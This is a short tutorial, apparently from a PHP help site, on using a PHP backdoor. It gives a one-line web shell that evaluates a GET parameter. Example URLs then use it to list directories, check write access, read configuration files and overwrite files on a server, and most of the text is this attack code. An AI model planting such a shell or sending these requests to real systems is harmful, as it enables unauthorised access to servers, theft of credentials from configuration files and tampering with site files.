Today we will talk about some of the most common uses of PHP backdoors
First, write the simplest backdoor, which can also be called a Trojan.
<?php eval($_GET['evl']);
That's it, you have obtained a lot of execution permissions on this server.
What are the usages of that scene?
Print serverphpinfo
http://www.test.com/a.php?evl=phpinfo()
Check what files are in a directory
http://www.test.com/a.php?evl=var_dump(system("ls /mnt/web/ -a"));Check whether the directory is writable, the next step You can create an executable file in a writable directory
http://www.test.com/a.php?evl=var_dump(is_writable("/mnt/web/abc/"));Get the content of a file, generally used to read the configuration
http://www.test.com/a.php?evl=var_dump(file_get_contents("/mnt/web/temp/api.php"));Write files to a writable directory
http://www.test.com/a.php?evl=var_dump(file_put_contents("/mnt/web/temp/api.php",file_get_contents("/mnt/web/script/test.php")));Okay, the above part has basically destroyed the part that can be used to view a server. Let’s try to draw inferences about other functions.
The above is the detailed content of Some uses of PHP backdoor. For more information, please follow other related articles on the PHP Chinese website!
![[Web front-end] Node.js quick start](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
